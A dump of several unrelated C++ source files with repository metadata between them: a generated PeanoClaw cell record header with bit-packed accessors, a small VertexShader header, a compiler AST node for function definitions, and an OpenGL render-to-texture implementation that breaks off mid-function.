tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ CellPacked convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifndef DaStGenPackedPadding #define DaStGenPackedPadding 1 // 32 bit version // #define DaStGenPackedPadding 2 // 64 bit version #endif #ifdef PackedRecords #pragma pack (push, DaStGenPackedPadding) #endif /** * @author This class is generated by DaStGen * DataStructureGenerator (DaStGen) * 2007-2009 Wolfgang Eckhardt * 2012 Tobias Weinzierl * * build date: 09-02-2014 14:40 * * @date 24/10/2015 20:24 */ class peanoclaw::records::CellPacked { public: typedef peanoclaw::records::Cell::State State; struct PersistentRecords { int _cellDescriptionIndex; int _level; tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> _accessNumber; int _numberOfLoadsFromInputStream; int _numberOfStoresToOutputStream; /** mapping of records: || Member || startbit || length | isInside | startbit 0 | #bits 1 | state | startbit 1 | #bits 2 | evenFlags | startbit 3 | #bits DIMENSIONS */ short int _packedRecords0; /** * Generated */ PersistentRecords(); /** * Generated */ PersistentRecords(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _packedRecords0 = static_cast<short int>( isInside ? (_packedRecords0 | mask) : (_packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _packedRecords0 = static_cast<short int>(_packedRecords0 & ~mask); _packedRecords0 = static_cast<short int>(_packedRecords0 | evenFlags.to_ulong() << (3)); } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _accessNumber = (accessNumber); } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _numberOfStoresToOutputStream = numberOfStoresToOutputStream; } }; private: PersistentRecords _persistentRecords; public: /** * Generated */ CellPacked(); /** * Generated */ CellPacked(const PersistentRecords& persistentRecords); /** * Generated */ CellPacked(const int& cellDescriptionIndex, const bool& isInside, const State& state, const int& level, const std::bitset<DIMENSIONS>& evenFlags, const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber, const int& numberOfLoadsFromInputStream, const int& numberOfStoresToOutputStream); /** * Generated */ virtual ~CellPacked(); inline int getCellDescriptionIndex() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._cellDescriptionIndex; } inline void setCellDescriptionIndex(const int& cellDescriptionIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._cellDescriptionIndex = cellDescriptionIndex; } inline bool getIsInside() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); return (tmp != 0); } inline void setIsInside(const bool& isInside) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = 1 << (0); _persistentRecords._packedRecords0 = static_cast<short int>( isInside ? (_persistentRecords._packedRecords0 | mask) : (_persistentRecords._packedRecords0 & ~mask)); } inline State getState() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (1)); assertion(( tmp >= 0 && tmp <= 2)); return (State) tmp; } inline void setState(const State& state) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion((state >= 0 && state <= 2)); short int mask = (1 << (2)) - 1; mask = static_cast<short int>(mask << (1)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | state << (1)); } inline int getLevel() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._level; } inline void setLevel(const int& level) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._level = level; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline std::bitset<DIMENSIONS> getEvenFlags() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); short int tmp = static_cast<short int>(_persistentRecords._packedRecords0 & mask); tmp = static_cast<short int>(tmp >> (3)); std::bitset<DIMENSIONS> result = tmp; return result; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setEvenFlags(const std::bitset<DIMENSIONS>& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { short int mask = (short int) (1 << (DIMENSIONS)) - 1 ; mask = static_cast<short int>(mask << (3)); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 & ~mask); _persistentRecords._packedRecords0 = static_cast<short int>(_persistentRecords._packedRecords0 | evenFlags.to_ulong() << (3)); } inline bool getEvenFlags(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; return (_persistentRecords._packedRecords0& mask); } inline void setEvenFlags(int elementIndex, const bool& evenFlags) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); assertion(!evenFlags || evenFlags==1); int shift = 3 + elementIndex; int mask = 1 << (shift); int shiftedValue = evenFlags << (shift); _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 & ~mask; _persistentRecords._packedRecords0 = _persistentRecords._packedRecords0 | shiftedValue; } inline void flipEvenFlags(int elementIndex) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS); int mask = 1 << (3); mask = mask << elementIndex; _persistentRecords._packedRecords0^= mask; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int> getAccessNumber() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._accessNumber; } /** * Generated and optimized * * If you realise a for loop using exclusively arrays (vectors) and compile * with -DUseManualAlignment you may add * \code #pragma vector aligned #pragma simd \endcode to this for loop to enforce your compiler to use SSE/AVX. * * The alignment is tied to the unpacked records, i.e. for packed class * variants the machine's natural alignment is switched off to recude the * memory footprint. Do not use any SSE/AVX operations or * vectorisation on the result for the packed variants, as the data is misaligned. * If you rely on vectorisation, convert the underlying record * into the unpacked version first. * * @see convert() */ inline void setAccessNumber(const tarch::la::Vector<DIMENSIONS_TIMES_TWO,short int>& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._accessNumber = (accessNumber); } inline short int getAccessNumber(int elementIndex) const #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); return _persistentRecords._accessNumber[elementIndex]; } inline void setAccessNumber(int elementIndex, const short int& accessNumber) #ifdef UseManualInlining __attribute__((always_inline)) #endif { assertion(elementIndex>=0); assertion(elementIndex<DIMENSIONS_TIMES_TWO); _persistentRecords._accessNumber[elementIndex]= accessNumber; } inline int getNumberOfLoadsFromInputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfLoadsFromInputStream; } inline void setNumberOfLoadsFromInputStream(const int& numberOfLoadsFromInputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfLoadsFromInputStream = numberOfLoadsFromInputStream; } inline int getNumberOfStoresToOutputStream() const #ifdef UseManualInlining __attribute__((always_inline)) #endif { return _persistentRecords._numberOfStoresToOutputStream; } inline void setNumberOfStoresToOutputStream(const int& numberOfStoresToOutputStream) #ifdef UseManualInlining __attribute__((always_inline)) #endif { _persistentRecords._numberOfStoresToOutputStream = numberOfStoresToOutputStream; } /** * Generated */ static std::string toString(const State& param); /** * Generated */ static std::string getStateMapping(); /** * Generated */ std::string toString() const; /** * Generated */ void toString(std::ostream& out) const; PersistentRecords getPersistentRecords() const; /** * Generated */ Cell convert() const; #ifdef Parallel protected: static tarch::logging::Log _log; int _senderDestinationRank; public: /** * Global that represents the mpi datatype. * There are two variants: Datatype identifies only those attributes marked with * parallelise. FullDatatype instead identifies the whole record with all fields. */ static MPI_Datatype Datatype; static MPI_Datatype FullDatatype; /** * Initializes the data type for the mpi operations. Has to be called * before the very first send or receive operation is called. */ static void initDatatype(); static void shutdownDatatype(); /** * @param communicateSleep -1 Data exchange through blocking mpi * @param communicateSleep 0 Data exchange through non-blocking mpi, i.e. pending messages are received via polling until MPI_Test succeeds * @param communicateSleep >0 Same as 0 but in addition, each unsuccessful MPI_Test is follows by an usleep */ void send(int destination, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); void receive(int source, int tag, bool exchangeOnlyAttributesMarkedWithParallelise, int communicateSleep); static bool isMessageInQueue(int tag, bool exchangeOnlyAttributesMarkedWithParallelise); int getSenderRank() const; #endif }; #ifdef PackedRecords #pragma pack (pop) #endif #endif #endif
1292e27fb024bcccd16a5ac86fa4027abb312ac6
ea8c5d95b3b50b02f2eae70b7072b7105ba67a1f
/VertexShader.h
d41747c426d94f371ad940d9595a79058ed234ea
[]
no_license
AlessandroCinque/Rest_In_Hell
0539b5420ac451f1b1b39387c4a29dfde20ed608
6cf9a487ef36e0f57445663b8c416fcf7054d23f
refs/heads/master
2020-06-01T22:00:28.418611
2019-06-08T22:50:59
2019-06-08T22:50:59
188,457,688
0
0
null
null
null
null
UTF-8
C++
false
false
81
h
#pragma once class VertexShader { public: VertexShader(); ~VertexShader(); };
710a7c5f67bcc3e42d9ad16637ebb78432d8bb23
db720628001acae4fb7cecb41b4a1f989e2c48b3
/fir_ef/ast/function_definition_node.h
b079a6e478012863e0876ca7e10db2801543647e
[]
no_license
guisaraiva2000/Compilers
dad735cfb9d99ce889e0815fd0f13e6bd3cc689f
1aa08f8babac0686a78b6fccd1bd00e51bd4576e
refs/heads/main
2023-06-09T15:34:47.849387
2021-06-27T10:20:51
2021-06-27T10:20:51
380,709,388
0
1
null
null
null
null
UTF-8
C++
false
false
1,570
h
#ifndef __FIR_AST_FUNCTION_DEFINITION_H__ #define __FIR_AST_FUNCTION_DEFINITION_H__ #include <string> #include <cdk/ast/typed_node.h> #include <cdk/ast/sequence_node.h> #include "ast/block_node.h" namespace fir { class function_definition_node: public cdk::typed_node { int _qualifier; std::string _identifier; cdk::sequence_node *_arguments; cdk::expression_node *_retval; fir::body_node *_body; public: function_definition_node(int lineno, std::shared_ptr<cdk::basic_type> funType, int qualifier, const std::string &identifier, cdk::sequence_node *arguments, cdk::expression_node *retval, fir::body_node *body) : cdk::typed_node(lineno), _qualifier(qualifier), _identifier(identifier), _arguments(arguments), _retval(retval), _body(body) { type(funType); } public: int qualifier() { return _qualifier; } const std::string& identifier() const { return _identifier; } cdk::sequence_node* arguments() { return _arguments; } cdk::typed_node* argument(size_t ax) { return dynamic_cast<cdk::typed_node*>(_arguments->node(ax)); } fir::body_node* body() { return _body; } cdk::expression_node* retval() { return _retval; } void accept(basic_ast_visitor *sp, int level) { sp->do_function_definition_node(this, level); } }; } // fir #endif
d99baf1da5153b1f442a7d06a1269f3e09e1efd0
7ed9ddde7aa126433fccaaf724415d08d59caec2
/TalkingScene/WalaberEngine/Walaber/src/Graphics/Textures/RenderTexture.cpp
9bf9a4e0a6b71a031012f78d48e787335be34556
[]
no_license
DannyTking/TalkingScene
7b01c92d273d15f0b9c72b2170fdb5a7b95b5e22
b73828e69b4324ccb8f26648dbb3b5b8cbddeb8f
refs/heads/master
2020-12-30T10:36:40.516557
2013-12-23T01:34:45
2013-12-23T01:34:45
13,242,667
0
2
null
null
null
null
UTF-8
C++
false
false
14,700
cpp
#include "RenderTexture.h" #include <GraphicsGL.h> #include <FileManager.h> #include <FileHelper.h> #include <WalaberMath.h> #include <StringHelper.h> #include <MemberCallback.h> #include "./SOIL/SOIL.h" namespace Walaber { // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- void RenderTexture2D::initWithSize( unsigned int w, unsigned int h, TextureInMemoryColorspace fmt ) { // FRAMEBUFFER 1 - this is the main buffer for rendering the fluids. width_ = Walaber::nextPOT(w); height_ = Walaber::nextPOT(h); size_ = Vector2(w, h); offset_ = Vector2::Zero; minS_ = 0.0f; minT_ = 0.0f; maxS_ = (float)w / (float)width_; maxT_ = (float)h / (float)height_; GLint prevBuffer = GraphicsGL::getBoundFramebuffer(); GL_GEN_FRAMEBUFFERS(1, &frameBuffer_); Walaber::GraphicsGL::bindFramebuffer( frameBuffer_); glGenTextures(1, &name_); GraphicsGL::bindTexture( name_ ); Logger::printf("Walaber", Logger::SV_DEBUG, "RenderTexture2D::initWithSize() - tex: %d framebuffer: %d", name_, frameBuffer_); // settings... glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR); glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR); bool ok = false; while (!ok) { switch (fmt) { case TextureInMemoryColorspace_16_R4_G4_B4_A4: default: // 16-bit render buffer... (r4 g4 b4 a4) mFormat = GL_RGBA; mType = GL_UNSIGNED_SHORT_4_4_4_4; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width_, height_, 0, GL_RGBA, GL_UNSIGNED_SHORT_4_4_4_4, NULL); break; case TextureInMemoryColorspace_16_R5_G5_B5_A1: // 16-bit render buffer... (r5, g5, b5, a1) mFormat = GL_RGBA; mType = GL_UNSIGNED_SHORT_5_5_5_1; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width_, height_, 0, GL_RGBA, GL_UNSIGNED_SHORT_5_5_5_1, NULL); break; case TextureInMemoryColorspace_16_R5_G6_B5: // 16-bit render buffer... (r5, g6, b5) mFormat = GL_RGB; mType = GL_UNSIGNED_SHORT_5_6_5; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width_, height_, 0, GL_RGB, GL_UNSIGNED_SHORT_5_6_5, NULL); break; case TextureInMemoryColorspace_32_R8_G8_B8_A8: // 32-bit render buffer... mFormat = GL_RGBA; mType = GL_UNSIGNED_BYTE; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width_, height_, 0, GL_RGBA, GL_UNSIGNED_BYTE, NULL); break; } GL_FRAMEBUFFER_TEXTURE2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, name_, 0); GLenum status = GL_CHECK_FRAMEBUFFER_STATUS(GL_FRAMEBUFFER); if(status != GL_FRAMEBUFFER_COMPLETE) { Logger::printf("Walaber", Logger::SV_ERROR, "failed to make complete framebuffer object %x", status); // if we were NOT a 32-bit format, try again with that format, because some devices don't support 16-bit framebuffers. if (fmt != TextureInMemoryColorspace_32_R8_G8_B8_A8) { fmt = TextureInMemoryColorspace_32_R8_G8_B8_A8; } else { break; } } else { ok = true; break; } } glClearColor(0.0f, 0.0f, 0.0f, 0.0f); glClear(GL_COLOR_BUFFER_BIT); // go back to old frame buffer... Walaber::GraphicsGL::bindFramebuffer( prevBuffer ); } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- /** * Similar to {@link initWithSize} * - In fact it's nearly identical except it also initializes the texture with the supplied pixel data. * If pixelData is NULL the result should be the same * */ void RenderTexture2D::initWithPixelData( unsigned int w, unsigned int h, TextureInMemoryColorspace fmt, unsigned char *pixelData ) { width_ = Walaber::nextPOT(w); height_ = Walaber::nextPOT(h); size_ = Vector2(w, h); offset_ = Vector2::Zero; minS_ = 0.0f; minT_ = 0.0f; maxS_ = (float)w / (float)width_; maxT_ = (float)h / (float)height_; GLint prevBuffer = GraphicsGL::getBoundFramebuffer(); GL_GEN_FRAMEBUFFERS(1, &frameBuffer_); Walaber::GraphicsGL::bindFramebuffer( frameBuffer_); glGenTextures(1, &name_); GraphicsGL::bindTexture( name_ ); Logger::printf("Walaber", Logger::SV_DEBUG, "RenderTexture2D::initWithPixelData() - tex: %d framebuffer: %d", name_, frameBuffer_); // settings... glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR); glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR); // glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, GL_CLAMP_TO_EDGE); // glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, GL_CLAMP_TO_EDGE); bool ok = false; while (!ok) { switch (fmt) { case TextureInMemoryColorspace_16_R4_G4_B4_A4: default: // 16-bit render buffer... (r4 g4 b4 a4) mFormat = GL_RGBA; mType = GL_UNSIGNED_SHORT_4_4_4_4; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width_, height_, 0, GL_RGBA, GL_UNSIGNED_SHORT_4_4_4_4, pixelData); break; case TextureInMemoryColorspace_16_R5_G5_B5_A1: // 16-bit render buffer... (r5, g5, b5, a1) mFormat = GL_RGBA; mType = GL_UNSIGNED_SHORT_5_5_5_1; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width_, height_, 0, GL_RGBA, GL_UNSIGNED_SHORT_5_5_5_1, pixelData); break; case TextureInMemoryColorspace_16_R5_G6_B5: // 16-bit render buffer... (r5, g6, b5) mFormat = GL_RGB; mType = GL_UNSIGNED_SHORT_5_6_5; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGB, width_, height_, 0, GL_RGB, GL_UNSIGNED_SHORT_5_6_5, pixelData); break; case TextureInMemoryColorspace_32_R8_G8_B8_A8: // 32-bit render buffer... mFormat = GL_RGBA; mType = GL_UNSIGNED_BYTE; glTexImage2D(GL_TEXTURE_2D, 0, GL_RGBA, width_, height_, 0, GL_RGBA, GL_UNSIGNED_BYTE, pixelData); break; } GL_FRAMEBUFFER_TEXTURE2D(GL_FRAMEBUFFER, GL_COLOR_ATTACHMENT0, GL_TEXTURE_2D, name_, 0); GLenum status = GL_CHECK_FRAMEBUFFER_STATUS(GL_FRAMEBUFFER); if(status != GL_FRAMEBUFFER_COMPLETE) { Logger::printf("Walaber", Logger::SV_ERROR, "failed to make complete framebuffer object %x", status); // if we were NOT a 32-bit format, try again with that format, because some devices don't support 16-bit framebuffers. if (fmt != TextureInMemoryColorspace_32_R8_G8_B8_A8) { fmt = TextureInMemoryColorspace_32_R8_G8_B8_A8; } else { break; } } else { ok = true; break; } } // Ha! ... we just set the color data! (hopefully) // So don't clear buffer ... unless pixelData is NULL if ( pixelData == NULL ) { glClearColor(0.0f, 0.0f, 0.0f, 0.0f); glClear(GL_COLOR_BUFFER_BIT); } // go back to old frame buffer... Walaber::GraphicsGL::bindFramebuffer( prevBuffer ); } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- void RenderTexture2D::bind() { // store previously bound buffer prevBuffer_ = GraphicsGL::getBoundFramebuffer(); // store viewport settings... GraphicsGL::getViewport(prevViewportX_, prevViewportY_, prevViewportW_, prevViewportH_); // store matrices... glGetFloatv(GL_MODELVIEW_MATRIX, prevModelView_); glGetFloatv(GL_PROJECTION_MATRIX, prevProjection_); Logger::printf("Walaber", Logger::SV_VERBOSE, "RenderTexture2D::bind() - prev buffer [%d] viewport[%d %d %d %d]\n", prevBuffer_, prevViewportX_, prevViewportY_, prevViewportW_, prevViewportH_); Logger::printf("Walaber", Logger::SV_VERBOSE, "RenderTexture2D::bind() - this buffer [%d]\n", frameBuffer_); // now bind US Walaber::GraphicsGL::bindFramebuffer( frameBuffer_ ); Logger::printf("Walaber", Logger::SV_VERBOSE, "RenderTexture2D::bind() - check for error\n"); GraphicsGL::checkForError(); } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- void RenderTexture2D::unbind() { // bind back to prev. buffer Logger::printf("Walaber", Logger::SV_VERBOSE, "RenderTexture2D::unbind() - prev buffer [%d]\n", prevBuffer_); Walaber::GraphicsGL::bindFramebuffer( prevBuffer_ ); // restore viewport. GraphicsGL::setViewport(prevViewportX_, prevViewportY_, prevViewportW_, prevViewportH_); glMatrixMode(GL_PROJECTION); glLoadIdentity(); glLoadMatrixf(prevProjection_); // restore matrices... glMatrixMode(GL_MODELVIEW); glLoadIdentity(); glLoadMatrixf(prevModelView_); } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- void RenderTexture2D::setViewport() { GraphicsGL::setViewport(0, 0, (int)size_.X, (int)size_.Y); } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- void RenderTexture2D::_applySettings() { Walaber::Logger::printf("WMW", Logger::SV_DEBUG, "_applySettings...\n"); if (name_ != NO_TEXTURE) { GraphicsGL::bindTexture(name_); // set texture parameters here glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, settings_.getMinFilter()); glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, settings_.getMagFilter()); glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_S, settings_.getWrapU()); glTexParameteri(GL_TEXTURE_2D, GL_TEXTURE_WRAP_T, settings_.getWrapV()); settings_.debugLog(); Walaber::Logger::printf("WMW", Logger::SV_DEBUG, "\n"); } } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- RenderTexture2DPtr createRenderTexture2D(unsigned int width, unsigned int height, TextureInMemoryColorspace fmt) { RenderTexture2DPtr newTexture(new RenderTexture2D(width, height, fmt)); return newTexture; } // ---------------------------------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------------------------------- RenderTexture2DPtr createRenderTexture2D(unsigned int width, unsigned int height, TextureSettings settings, TextureInMemoryColorspace fmt) { RenderTexture2DPtr 